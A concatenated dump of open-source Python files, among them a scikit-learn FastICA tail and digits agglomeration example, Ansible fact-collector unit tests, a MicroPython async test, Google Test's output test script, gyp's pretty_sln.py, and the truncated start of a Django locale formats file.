X = check_array(X, copy=(copy and self.whiten), dtype=FLOAT_DTYPES)
X = fast_dot(X, self.mixing_.T)
if self.whiten:
X += self.mean_
return X
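# Minimal usage sketch (illustrative only, not part of the original module):
# recover two estimated sources from toy data, then map them back. The toy
# data and parameter choices here are assumptions for demonstration.
if __name__ == '__main__':
    rng = np.random.RandomState(0)
    X_demo = rng.normal(size=(100, 4))      # (n_samples, n_features)
    ica = FastICA(n_components=2, random_state=0)
    S_demo = ica.fit_transform(X_demo)      # (100, 2) estimated sources
    X_back = ica.inverse_transform(S_demo)  # (100, 4) remixed data
    print(S_demo.shape, X_back.shape)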
|
rexshihaoren/scikit-learn
|
refs/heads/master
|
examples/cluster/plot_digits_agglomeration.py
|
377
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
"""
=========================================================
Feature agglomeration
=========================================================
These images show how similar features are merged together using
feature agglomeration.
"""
print(__doc__)
# Code source: Gaël Varoquaux
# Modified for documentation by Jaques Grobler
# License: BSD 3 clause
import numpy as np
import matplotlib.pyplot as plt
from sklearn import datasets, cluster
from sklearn.feature_extraction.image import grid_to_graph
digits = datasets.load_digits()
images = digits.images
X = np.reshape(images, (len(images), -1))
connectivity = grid_to_graph(*images[0].shape)
agglo = cluster.FeatureAgglomeration(connectivity=connectivity,
n_clusters=32)
agglo.fit(X)
X_reduced = agglo.transform(X)
X_restored = agglo.inverse_transform(X_reduced)
images_restored = np.reshape(X_restored, images.shape)
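# Shapes, for reference: X is (n_samples, 64) since each 8x8 digit image is
# flattened; with n_clusters=32 the transform reduces that to (n_samples, 32),
# and inverse_transform assigns every pixel the pooled value of its cluster.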
plt.figure(1, figsize=(4, 3.5))
plt.clf()
plt.subplots_adjust(left=.01, right=.99, bottom=.01, top=.91)
for i in range(4):
plt.subplot(3, 4, i + 1)
plt.imshow(images[i], cmap=plt.cm.gray, vmax=16, interpolation='nearest')
plt.xticks(())
plt.yticks(())
if i == 1:
plt.title('Original data')
plt.subplot(3, 4, 4 + i + 1)
plt.imshow(images_restored[i], cmap=plt.cm.gray, vmax=16,
interpolation='nearest')
if i == 1:
plt.title('Agglomerated data')
plt.xticks(())
plt.yticks(())
plt.subplot(3, 4, 10)
plt.imshow(np.reshape(agglo.labels_, images[0].shape),
interpolation='nearest', cmap=plt.cm.spectral)
plt.xticks(())
plt.yticks(())
plt.title('Labels')
plt.show()
|
Tatsh-ansible/ansible
|
refs/heads/devel
|
test/units/module_utils/facts/test_collectors.py
|
39
|
# unit tests for ansible fact collectors
# -*- coding: utf-8 -*-
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
#
# Make coding more python3-ish
from __future__ import (absolute_import, division)
__metaclass__ = type
from ansible.compat.tests.mock import Mock, patch
from . base import BaseFactsTest
from ansible.module_utils.facts import collector
from ansible.module_utils.facts.system.apparmor import ApparmorFactCollector
from ansible.module_utils.facts.system.caps import SystemCapabilitiesFactCollector
from ansible.module_utils.facts.system.cmdline import CmdLineFactCollector
from ansible.module_utils.facts.system.distribution import DistributionFactCollector
from ansible.module_utils.facts.system.dns import DnsFactCollector
from ansible.module_utils.facts.system.env import EnvFactCollector
from ansible.module_utils.facts.system.fips import FipsFactCollector
from ansible.module_utils.facts.system.pkg_mgr import PkgMgrFactCollector
from ansible.module_utils.facts.system.platform import PlatformFactCollector
from ansible.module_utils.facts.system.python import PythonFactCollector
from ansible.module_utils.facts.system.selinux import SelinuxFactCollector
from ansible.module_utils.facts.system.service_mgr import ServiceMgrFactCollector
from ansible.module_utils.facts.system.ssh_pub_keys import SshPubKeyFactCollector
from ansible.module_utils.facts.system.user import UserFactCollector
from ansible.module_utils.facts.virtual.base import VirtualCollector
from ansible.module_utils.facts.network.base import NetworkCollector
from ansible.module_utils.facts.hardware.base import HardwareCollector
class CollectorException(Exception):
pass
class ExceptionThrowingCollector(collector.BaseFactCollector):
name = 'exc_throwing'
def __init__(self, collectors=None, namespace=None, exception=None):
super(ExceptionThrowingCollector, self).__init__(collectors, namespace)
self._exception = exception or CollectorException('collection failed')
def collect(self, module=None, collected_facts=None):
raise self._exception
class TestExceptionThrowingCollector(BaseFactsTest):
__test__ = True
gather_subset = ['exc_throwing']
valid_subsets = ['exc_throwing']
collector_class = ExceptionThrowingCollector
def test_collect(self):
module = self._mock_module()
fact_collector = self.collector_class()
self.assertRaises(CollectorException,
fact_collector.collect,
module=module,
collected_facts=self.collected_facts)
def test_collect_with_namespace(self):
module = self._mock_module()
fact_collector = self.collector_class()
self.assertRaises(CollectorException,
fact_collector.collect_with_namespace,
module=module,
collected_facts=self.collected_facts)
class TestApparmorFacts(BaseFactsTest):
__test__ = True
gather_subset = ['!all', 'apparmor']
valid_subsets = ['apparmor']
fact_namespace = 'ansible_apparmor'
collector_class = ApparmorFactCollector
def test_collect(self):
facts_dict = super(TestApparmorFacts, self).test_collect()
self.assertIn('status', facts_dict['apparmor'])
class TestCapsFacts(BaseFactsTest):
__test__ = True
gather_subset = ['!all', 'caps']
valid_subsets = ['caps']
fact_namespace = 'ansible_system_capabilities'
collector_class = SystemCapabilitiesFactCollector
def _mock_module(self):
mock_module = Mock()
mock_module.params = {'gather_subset': self.gather_subset,
'gather_timeout': 10,
'filter': '*'}
mock_module.get_bin_path = Mock(return_value='/usr/sbin/capsh')
mock_module.run_command = Mock(return_value=(0, 'Current: =ep', ''))
return mock_module
class TestCmdLineFacts(BaseFactsTest):
__test__ = True
gather_subset = ['!all', 'cmdline']
valid_subsets = ['cmdline']
fact_namespace = 'ansible_cmdline'
collector_class = CmdLineFactCollector
def test_parse_proc_cmdline_uefi(self):
uefi_cmdline = r'initrd=\70ef65e1a04a47aea04f7b5145ea3537\4.10.0-19-generic\initrd root=UUID=50973b75-4a66-4bf0-9764-2b7614489e64 ro quiet'
expected = {'initrd': r'\70ef65e1a04a47aea04f7b5145ea3537\4.10.0-19-generic\initrd',
'root': 'UUID=50973b75-4a66-4bf0-9764-2b7614489e64',
'quiet': True,
'ro': True}
fact_collector = self.collector_class()
facts_dict = fact_collector._parse_proc_cmdline(uefi_cmdline)
self.assertDictEqual(facts_dict, expected)
def test_parse_proc_cmdline_fedora(self):
cmdline_fedora = r'BOOT_IMAGE=/vmlinuz-4.10.16-200.fc25.x86_64 root=/dev/mapper/fedora-root ro rd.lvm.lv=fedora/root rd.luks.uuid=luks-c80b7537-358b-4a07-b88c-c59ef187479b rd.lvm.lv=fedora/swap rhgb quiet LANG=en_US.UTF-8' # noqa
expected = {'BOOT_IMAGE': '/vmlinuz-4.10.16-200.fc25.x86_64',
'LANG': 'en_US.UTF-8',
'quiet': True,
'rd.luks.uuid': 'luks-c80b7537-358b-4a07-b88c-c59ef187479b',
'rd.lvm.lv': 'fedora/swap',
'rhgb': True,
'ro': True,
'root': '/dev/mapper/fedora-root'}
fact_collector = self.collector_class()
facts_dict = fact_collector._parse_proc_cmdline(cmdline_fedora)
self.assertDictEqual(facts_dict, expected)
def test_parse_proc_cmdline_dup_console(self):
example = r'BOOT_IMAGE=/boot/vmlinuz-4.4.0-72-generic root=UUID=e12e46d9-06c9-4a64-a7b3-60e24b062d90 ro console=tty1 console=ttyS0'
# FIXME: Two 'console' keywords? Using a dict for the fact value here loses info. Currently the 'last' one wins
expected = {'BOOT_IMAGE': '/boot/vmlinuz-4.4.0-72-generic',
'root': 'UUID=e12e46d9-06c9-4a64-a7b3-60e24b062d90',
'ro': True,
'console': 'ttyS0'}
fact_collector = self.collector_class()
facts_dict = fact_collector._parse_proc_cmdline(example)
# TODO: fails because we lose a 'console'
self.assertDictEqual(facts_dict, expected)
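# Illustrative sketch (not part of the test suite): the behavior exercised
# above is consistent with a minimal key=value split in which bare tokens
# map to True and the last duplicate key wins -- which is why only the
# final 'console' value survives in test_parse_proc_cmdline_dup_console.
def _sketch_parse_cmdline(cmdline):
    facts = {}
    for token in cmdline.split():
        if '=' in token:
            key, value = token.split('=', 1)
            facts[key] = value   # later duplicates overwrite earlier ones
        else:
            facts[token] = True  # bare flags such as 'ro' and 'quiet'
    return facts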
class TestDistributionFacts(BaseFactsTest):
__test__ = True
gather_subset = ['!all', 'distribution']
valid_subsets = ['distribution']
fact_namespace = 'ansible_distribution'
collector_class = DistributionFactCollector
class TestDnsFacts(BaseFactsTest):
__test__ = True
gather_subset = ['!all', 'dns']
valid_subsets = ['dns']
fact_namespace = 'ansible_dns'
collector_class = DnsFactCollector
class TestEnvFacts(BaseFactsTest):
__test__ = True
gather_subset = ['!all', 'env']
valid_subsets = ['env']
fact_namespace = 'ansible_env'
collector_class = EnvFactCollector
def test_collect(self):
facts_dict = super(TestEnvFacts, self).test_collect()
self.assertIn('HOME', facts_dict['env'])
class TestFipsFacts(BaseFactsTest):
__test__ = True
gather_subset = ['!all', 'fips']
valid_subsets = ['fips']
fact_namespace = 'ansible_fips'
collector_class = FipsFactCollector
class TestHardwareCollector(BaseFactsTest):
__test__ = True
gather_subset = ['!all', 'hardware']
valid_subsets = ['hardware']
fact_namespace = 'ansible_hardware'
collector_class = HardwareCollector
collected_facts = {'ansible_architecture': 'x86_64'}
class TestNetworkCollector(BaseFactsTest):
__test__ = True
gather_subset = ['!all', 'network']
valid_subsets = ['network']
fact_namespace = 'ansible_network'
collector_class = NetworkCollector
class TestPkgMgrFacts(BaseFactsTest):
__test__ = True
gather_subset = ['!all', 'pkg_mgr']
valid_subsets = ['pkg_mgr']
fact_namespace = 'ansible_pkgmgr'
collector_class = PkgMgrFactCollector
class TestPlatformFactCollector(BaseFactsTest):
__test__ = True
gather_subset = ['!all', 'platform']
valid_subsets = ['platform']
fact_namespace = 'ansible_platform'
collector_class = PlatformFactCollector
class TestPythonFactCollector(BaseFactsTest):
__test__ = True
gather_subset = ['!all', 'python']
valid_subsets = ['python']
fact_namespace = 'ansible_python'
collector_class = PythonFactCollector
class TestSelinuxFacts(BaseFactsTest):
__test__ = True
gather_subset = ['!all', 'selinux']
valid_subsets = ['selinux']
fact_namespace = 'ansible_selinux'
collector_class = SelinuxFactCollector
def test_no_selinux(self):
with patch('ansible.module_utils.facts.system.selinux.HAVE_SELINUX', False):
module = self._mock_module()
fact_collector = self.collector_class()
facts_dict = fact_collector.collect(module=module)
self.assertIsInstance(facts_dict, dict)
self.assertFalse(facts_dict['selinux'])
return facts_dict
class TestServiceMgrFacts(BaseFactsTest):
__test__ = True
gather_subset = ['!all', 'service_mgr']
valid_subsets = ['service_mgr']
fact_namespace = 'ansible_service_mgr'
collector_class = ServiceMgrFactCollector
# TODO: dedupe some of this test code
@patch('ansible.module_utils.facts.system.service_mgr.get_file_content', return_value=None)
def test_no_proc1(self, mock_gfc):
# no /proc/1/comm, ps returns non-0
        # should fall back to 'service'
module = self._mock_module()
module.run_command = Mock(return_value=(1, '', 'wat'))
fact_collector = self.collector_class()
facts_dict = fact_collector.collect(module=module)
self.assertIsInstance(facts_dict, dict)
self.assertEqual(facts_dict['service_mgr'], 'service')
@patch('ansible.module_utils.facts.system.service_mgr.get_file_content', return_value=None)
def test_no_proc1_ps_random_init(self, mock_gfc):
        # no /proc/1/comm, ps returns '/sbin/sys11', which we don't know;
        # should end up returning 'sys11'
module = self._mock_module()
module.run_command = Mock(return_value=(0, '/sbin/sys11', ''))
fact_collector = self.collector_class()
facts_dict = fact_collector.collect(module=module)
self.assertIsInstance(facts_dict, dict)
self.assertEqual(facts_dict['service_mgr'], 'sys11')
@patch('ansible.module_utils.facts.system.service_mgr.get_file_content', return_value=None)
def test_clowncar(self, mock_gfc):
        # no /proc/1/comm, ps fails, distro and system are unknown ('clowncar')
        # should fall back to 'service'
module = self._mock_module()
module.run_command = Mock(return_value=(1, '', ''))
collected_facts = {'distribution': 'clowncar',
'system': 'ClownCarOS'}
fact_collector = self.collector_class()
facts_dict = fact_collector.collect(module=module,
collected_facts=collected_facts)
self.assertIsInstance(facts_dict, dict)
self.assertEqual(facts_dict['service_mgr'], 'service')
# TODO: reenable these tests when we can mock more easily
# @patch('ansible.module_utils.facts.system.service_mgr.get_file_content', return_value=None)
# def test_sunos_fallback(self, mock_gfc):
# # no /proc/1/comm, ps fails, 'system' is SunOS
# # should end up return 'smf'?
# module = self._mock_module()
# # FIXME: the result here is a kluge to at least cover more of service_mgr.collect
# # TODO: remove
# # FIXME: have to force a pid for results here to get into any of the system/distro checks
# module.run_command = Mock(return_value=(1, ' 37 ', ''))
# collected_facts = {'system': 'SunOS'}
# fact_collector = self.collector_class(module=module)
# facts_dict = fact_collector.collect(collected_facts=collected_facts)
# print('facts_dict: %s' % facts_dict)
# self.assertIsInstance(facts_dict, dict)
# self.assertEqual(facts_dict['service_mgr'], 'smf')
# @patch('ansible.module_utils.facts.system.service_mgr.get_file_content', return_value=None)
# def test_aix_fallback(self, mock_gfc):
    #     # no /proc/1/comm, ps fails, 'system' is AIX
    #     # should end up returning 'src'?
# module = self._mock_module()
# module.run_command = Mock(return_value=(1, '', ''))
# collected_facts = {'system': 'AIX'}
# fact_collector = self.collector_class(module=module)
# facts_dict = fact_collector.collect(collected_facts=collected_facts)
# print('facts_dict: %s' % facts_dict)
# self.assertIsInstance(facts_dict, dict)
# self.assertEqual(facts_dict['service_mgr'], 'src')
# @patch('ansible.module_utils.facts.system.service_mgr.get_file_content', return_value=None)
# def test_linux_fallback(self, mock_gfc):
    #     # no /proc/1/comm, ps fails, 'system' is Linux
# # should end up return 'smf'?
# module = self._mock_module()
# module.run_command = Mock(return_value=(1, ' 37 ', ''))
# collected_facts = {'system': 'Linux'}
# fact_collector = self.collector_class(module=module)
# facts_dict = fact_collector.collect(collected_facts=collected_facts)
# print('facts_dict: %s' % facts_dict)
# self.assertIsInstance(facts_dict, dict)
# self.assertEqual(facts_dict['service_mgr'], 'sdfadf')
class TestSshPubKeyFactCollector(BaseFactsTest):
__test__ = True
gather_subset = ['!all', 'ssh_pub_keys']
valid_subsets = ['ssh_pub_keys']
    fact_namespace = 'ansible_ssh_pub_keys'
collector_class = SshPubKeyFactCollector
class TestUserFactCollector(BaseFactsTest):
__test__ = True
gather_subset = ['!all', 'user']
valid_subsets = ['user']
fact_namespace = 'ansible_user'
collector_class = UserFactCollector
class TestVirtualFacts(BaseFactsTest):
__test__ = True
gather_subset = ['!all', 'virtual']
valid_subsets = ['virtual']
fact_namespace = 'ansible_virtual'
collector_class = VirtualCollector
|
deshipu/micropython
|
refs/heads/master
|
tests/basics/async_await.py
|
63
|
# test basic await expression
# adapted from PEP0492
async def abinary(n):
print(n)
if n <= 0:
return 1
l = await abinary(n - 1)
r = await abinary(n - 1)
return l + 1 + r
o = abinary(4)
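# Drive the coroutine by hand: each send(None) resumes it until the whole
# awaited call tree completes, at which point StopIteration is raised.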
try:
while True:
o.send(None)
except StopIteration:
print('finished')
|
ideasiii/ControllerPlatform
|
refs/heads/master
|
Controller-Mongodb/extLibs/mongo-cxx-driver/src/third_party/gtest-1.7.0/test/gtest_output_test.py
|
1733
|
#!/usr/bin/env python
#
# Copyright 2008, Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Tests the text output of Google C++ Testing Framework.
SYNOPSIS
gtest_output_test.py --build_dir=BUILD/DIR --gengolden
# where BUILD/DIR contains the built gtest_output_test_ file.
gtest_output_test.py --gengolden
gtest_output_test.py
"""
__author__ = 'wan@google.com (Zhanyong Wan)'
import os
import re
import sys
import gtest_test_utils
# The flag for generating the golden file
GENGOLDEN_FLAG = '--gengolden'
CATCH_EXCEPTIONS_ENV_VAR_NAME = 'GTEST_CATCH_EXCEPTIONS'
IS_WINDOWS = os.name == 'nt'
# TODO(vladl@google.com): remove the _lin suffix.
GOLDEN_NAME = 'gtest_output_test_golden_lin.txt'
PROGRAM_PATH = gtest_test_utils.GetTestExecutablePath('gtest_output_test_')
# At least one command we exercise must not have the
# --gtest_internal_skip_environment_and_ad_hoc_tests flag.
COMMAND_LIST_TESTS = ({}, [PROGRAM_PATH, '--gtest_list_tests'])
COMMAND_WITH_COLOR = ({}, [PROGRAM_PATH, '--gtest_color=yes'])
COMMAND_WITH_TIME = ({}, [PROGRAM_PATH,
'--gtest_print_time',
'--gtest_internal_skip_environment_and_ad_hoc_tests',
'--gtest_filter=FatalFailureTest.*:LoggingTest.*'])
COMMAND_WITH_DISABLED = (
{}, [PROGRAM_PATH,
'--gtest_also_run_disabled_tests',
'--gtest_internal_skip_environment_and_ad_hoc_tests',
'--gtest_filter=*DISABLED_*'])
COMMAND_WITH_SHARDING = (
{'GTEST_SHARD_INDEX': '1', 'GTEST_TOTAL_SHARDS': '2'},
[PROGRAM_PATH,
'--gtest_internal_skip_environment_and_ad_hoc_tests',
'--gtest_filter=PassingTest.*'])
GOLDEN_PATH = os.path.join(gtest_test_utils.GetSourceDir(), GOLDEN_NAME)
def ToUnixLineEnding(s):
"""Changes all Windows/Mac line endings in s to UNIX line endings."""
return s.replace('\r\n', '\n').replace('\r', '\n')
def RemoveLocations(test_output):
"""Removes all file location info from a Google Test program's output.
Args:
test_output: the output of a Google Test program.
Returns:
output with all file location info (in the form of
    'DIRECTORY/FILE_NAME:LINE_NUMBER: ' or
'DIRECTORY\\FILE_NAME(LINE_NUMBER): ') replaced by
'FILE_NAME:#: '.
"""
return re.sub(r'.*[/\\](.+)(\:\d+|\(\d+\))\: ', r'\1:#: ', test_output)
def RemoveStackTraceDetails(output):
"""Removes all stack traces from a Google Test program's output."""
# *? means "find the shortest string that matches".
return re.sub(r'Stack trace:(.|\n)*?\n\n',
'Stack trace: (omitted)\n\n', output)
def RemoveStackTraces(output):
"""Removes all traces of stack traces from a Google Test program's output."""
# *? means "find the shortest string that matches".
return re.sub(r'Stack trace:(.|\n)*?\n\n', '', output)
def RemoveTime(output):
"""Removes all time information from a Google Test program's output."""
return re.sub(r'\(\d+ ms', '(? ms', output)
def RemoveTypeInfoDetails(test_output):
"""Removes compiler-specific type info from Google Test program's output.
Args:
test_output: the output of a Google Test program.
Returns:
output with type information normalized to canonical form.
"""
# some compilers output the name of type 'unsigned int' as 'unsigned'
return re.sub(r'unsigned int', 'unsigned', test_output)
def NormalizeToCurrentPlatform(test_output):
"""Normalizes platform specific output details for easier comparison."""
if IS_WINDOWS:
# Removes the color information that is not present on Windows.
test_output = re.sub('\x1b\\[(0;3\d)?m', '', test_output)
# Changes failure message headers into the Windows format.
test_output = re.sub(r': Failure\n', r': error: ', test_output)
# Changes file(line_number) to file:line_number.
test_output = re.sub(r'((\w|\.)+)\((\d+)\):', r'\1:\3:', test_output)
return test_output
def RemoveTestCounts(output):
"""Removes test counts from a Google Test program's output."""
output = re.sub(r'\d+ tests?, listed below',
'? tests, listed below', output)
output = re.sub(r'\d+ FAILED TESTS',
'? FAILED TESTS', output)
output = re.sub(r'\d+ tests? from \d+ test cases?',
'? tests from ? test cases', output)
output = re.sub(r'\d+ tests? from ([a-zA-Z_])',
r'? tests from \1', output)
return re.sub(r'\d+ tests?\.', '? tests.', output)
def RemoveMatchingTests(test_output, pattern):
"""Removes output of specified tests from a Google Test program's output.
This function strips not only the beginning and the end of a test but also
all output in between.
Args:
test_output: A string containing the test output.
pattern: A regex string that matches names of test cases or
tests to remove.
Returns:
Contents of test_output with tests whose names match pattern removed.
"""
test_output = re.sub(
r'.*\[ RUN \] .*%s(.|\n)*?\[( FAILED | OK )\] .*%s.*\n' % (
pattern, pattern),
'',
test_output)
return re.sub(r'.*%s.*\n' % pattern, '', test_output)
def NormalizeOutput(output):
"""Normalizes output (the output of gtest_output_test_.exe)."""
output = ToUnixLineEnding(output)
output = RemoveLocations(output)
output = RemoveStackTraceDetails(output)
output = RemoveTime(output)
return output
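def _DemoNormalizeOutput():
  """Illustrative only (not part of the original test): runs one fabricated
  output line through the normalizers defined above."""
  sample = 'src/foo_test.cc:42: Failure (12 ms)\n'
  return NormalizeOutput(sample)  # -> 'foo_test.cc:#: Failure (? ms)\n'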
def GetShellCommandOutput(env_cmd):
"""Runs a command in a sub-process, and returns its output in a string.
Args:
env_cmd: The shell command. A 2-tuple where element 0 is a dict of extra
         environment variables to set, and element 1 is a list with
the command and any flags.
Returns:
A string with the command's combined standard and diagnostic output.
"""
# Spawns cmd in a sub-process, and gets its standard I/O file objects.
# Set and save the environment properly.
environ = os.environ.copy()
environ.update(env_cmd[0])
p = gtest_test_utils.Subprocess(env_cmd[1], env=environ)
return p.output
def GetCommandOutput(env_cmd):
"""Runs a command and returns its output with all file location
info stripped off.
Args:
env_cmd: The shell command. A 2-tuple where element 0 is a dict of extra
         environment variables to set, and element 1 is a list with
the command and any flags.
"""
# Disables exception pop-ups on Windows.
environ, cmdline = env_cmd
environ = dict(environ) # Ensures we are modifying a copy.
environ[CATCH_EXCEPTIONS_ENV_VAR_NAME] = '1'
return NormalizeOutput(GetShellCommandOutput((environ, cmdline)))
def GetOutputOfAllCommands():
"""Returns concatenated output from several representative commands."""
return (GetCommandOutput(COMMAND_WITH_COLOR) +
GetCommandOutput(COMMAND_WITH_TIME) +
GetCommandOutput(COMMAND_WITH_DISABLED) +
GetCommandOutput(COMMAND_WITH_SHARDING))
test_list = GetShellCommandOutput(COMMAND_LIST_TESTS)
SUPPORTS_DEATH_TESTS = 'DeathTest' in test_list
SUPPORTS_TYPED_TESTS = 'TypedTest' in test_list
SUPPORTS_THREADS = 'ExpectFailureWithThreadsTest' in test_list
SUPPORTS_STACK_TRACES = False
CAN_GENERATE_GOLDEN_FILE = (SUPPORTS_DEATH_TESTS and
SUPPORTS_TYPED_TESTS and
SUPPORTS_THREADS)
class GTestOutputTest(gtest_test_utils.TestCase):
def RemoveUnsupportedTests(self, test_output):
if not SUPPORTS_DEATH_TESTS:
test_output = RemoveMatchingTests(test_output, 'DeathTest')
if not SUPPORTS_TYPED_TESTS:
test_output = RemoveMatchingTests(test_output, 'TypedTest')
test_output = RemoveMatchingTests(test_output, 'TypedDeathTest')
test_output = RemoveMatchingTests(test_output, 'TypeParamDeathTest')
if not SUPPORTS_THREADS:
test_output = RemoveMatchingTests(test_output,
'ExpectFailureWithThreadsTest')
test_output = RemoveMatchingTests(test_output,
'ScopedFakeTestPartResultReporterTest')
test_output = RemoveMatchingTests(test_output,
'WorksConcurrently')
if not SUPPORTS_STACK_TRACES:
test_output = RemoveStackTraces(test_output)
return test_output
def testOutput(self):
output = GetOutputOfAllCommands()
golden_file = open(GOLDEN_PATH, 'rb')
    # A mis-configured source control system can cause \r to appear in EOL
    # sequences when we read the golden file, irrespective of the operating
    # system used. Therefore, we need to strip those \r's from newlines
    # unconditionally.
golden = ToUnixLineEnding(golden_file.read())
golden_file.close()
# We want the test to pass regardless of certain features being
# supported or not.
# We still have to remove type name specifics in all cases.
normalized_actual = RemoveTypeInfoDetails(output)
normalized_golden = RemoveTypeInfoDetails(golden)
if CAN_GENERATE_GOLDEN_FILE:
self.assertEqual(normalized_golden, normalized_actual)
else:
normalized_actual = NormalizeToCurrentPlatform(
RemoveTestCounts(normalized_actual))
normalized_golden = NormalizeToCurrentPlatform(
RemoveTestCounts(self.RemoveUnsupportedTests(normalized_golden)))
# This code is very handy when debugging golden file differences:
if os.getenv('DEBUG_GTEST_OUTPUT_TEST'):
open(os.path.join(
gtest_test_utils.GetSourceDir(),
'_gtest_output_test_normalized_actual.txt'), 'wb').write(
normalized_actual)
open(os.path.join(
gtest_test_utils.GetSourceDir(),
'_gtest_output_test_normalized_golden.txt'), 'wb').write(
normalized_golden)
self.assertEqual(normalized_golden, normalized_actual)
if __name__ == '__main__':
if sys.argv[1:] == [GENGOLDEN_FLAG]:
if CAN_GENERATE_GOLDEN_FILE:
output = GetOutputOfAllCommands()
golden_file = open(GOLDEN_PATH, 'wb')
golden_file.write(output)
golden_file.close()
else:
message = (
"""Unable to write a golden file when compiled in an environment
that does not support all the required features (death tests, typed tests,
and multiple threads). Please generate the golden file using a binary built
with those features enabled.""")
sys.stderr.write(message)
sys.exit(1)
else:
gtest_test_utils.Main()
|
Pflanzgurke/glimpse_client
|
refs/heads/develop
|
3rdparty/breakpad/src/tools/gyp/tools/pretty_sln.py
|
806
|
#!/usr/bin/env python
# Copyright (c) 2012 Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Prints the information in a sln file in a diffable way.
It first outputs each project in alphabetical order with its
dependencies.
Then it outputs a possible build order.
"""
__author__ = 'nsylvain (Nicolas Sylvain)'
import os
import re
import sys
import pretty_vcproj
def BuildProject(project, built, projects, deps):
# if all dependencies are done, we can build it, otherwise we try to build the
# dependency.
# This is not infinite-recursion proof.
for dep in deps[project]:
if dep not in built:
BuildProject(dep, built, projects, deps)
print project
built.append(project)
def ParseSolution(solution_file):
# All projects, their clsid and paths.
projects = dict()
# A list of dependencies associated with a project.
dependencies = dict()
# Regular expressions that matches the SLN format.
# The first line of a project definition.
begin_project = re.compile(('^Project\("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942'
'}"\) = "(.*)", "(.*)", "(.*)"$'))
# The last line of a project definition.
end_project = re.compile('^EndProject$')
# The first line of a dependency list.
begin_dep = re.compile('ProjectSection\(ProjectDependencies\) = postProject$')
# The last line of a dependency list.
end_dep = re.compile('EndProjectSection$')
# A line describing a dependency.
dep_line = re.compile(' *({.*}) = ({.*})$')
in_deps = False
solution = open(solution_file)
for line in solution:
results = begin_project.search(line)
if results:
# Hack to remove icu because the diff is too different.
if results.group(1).find('icu') != -1:
continue
# We remove "_gyp" from the names because it helps to diff them.
current_project = results.group(1).replace('_gyp', '')
projects[current_project] = [results.group(2).replace('_gyp', ''),
results.group(3),
results.group(2)]
dependencies[current_project] = []
continue
results = end_project.search(line)
if results:
current_project = None
continue
results = begin_dep.search(line)
if results:
in_deps = True
continue
results = end_dep.search(line)
if results:
in_deps = False
continue
results = dep_line.search(line)
if results and in_deps and current_project:
dependencies[current_project].append(results.group(1))
continue
# Change all dependencies clsid to name instead.
for project in dependencies:
    # For each dependency in this project
new_dep_array = []
for dep in dependencies[project]:
      # Look for the project name matching this clsid
for project_info in projects:
if projects[project_info][1] == dep:
new_dep_array.append(project_info)
dependencies[project] = sorted(new_dep_array)
return (projects, dependencies)
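# Illustrative note (not part of the original script): a project line such as
#   Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "base_gyp", "base\base.vcproj", "{SOME-GUID}"
# is parsed with '_gyp' stripped from the name, yielding
#   projects['base'] = ['base\base.vcproj', '{SOME-GUID}', 'base\base.vcproj']
# and the clsid-to-name pass above rewrites dependency GUIDs into names.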
def PrintDependencies(projects, deps):
print "---------------------------------------"
print "Dependencies for all projects"
print "---------------------------------------"
print "-- --"
for (project, dep_list) in sorted(deps.items()):
print "Project : %s" % project
print "Path : %s" % projects[project][0]
if dep_list:
for dep in dep_list:
print " - %s" % dep
print ""
print "-- --"
def PrintBuildOrder(projects, deps):
print "---------------------------------------"
print "Build order "
print "---------------------------------------"
print "-- --"
built = []
for (project, _) in sorted(deps.items()):
if project not in built:
BuildProject(project, built, projects, deps)
print "-- --"
def PrintVCProj(projects):
for project in projects:
print "-------------------------------------"
print "-------------------------------------"
print project
print project
print project
print "-------------------------------------"
print "-------------------------------------"
project_path = os.path.abspath(os.path.join(os.path.dirname(sys.argv[1]),
projects[project][2]))
pretty = pretty_vcproj
argv = [ '',
project_path,
'$(SolutionDir)=%s\\' % os.path.dirname(sys.argv[1]),
]
argv.extend(sys.argv[3:])
pretty.main(argv)
def main():
  # Check that we have at least 1 parameter.
if len(sys.argv) < 2:
print 'Usage: %s "c:\\path\\to\\project.sln"' % sys.argv[0]
return 1
(projects, deps) = ParseSolution(sys.argv[1])
PrintDependencies(projects, deps)
PrintBuildOrder(projects, deps)
if '--recursive' in sys.argv:
PrintVCProj(projects)
return 0
if __name__ == '__main__':
sys.exit(main())
|
aisipos/django
|
refs/heads/master
|
django/conf/locale/mn/formats.py
|
619
|
# -*- encoding: utf-8 -*-
# This file is distributed under the same license as the Django package.
#
from __future__ import unicode_literals
# The *_FORMAT strings use the Django date format syntax,
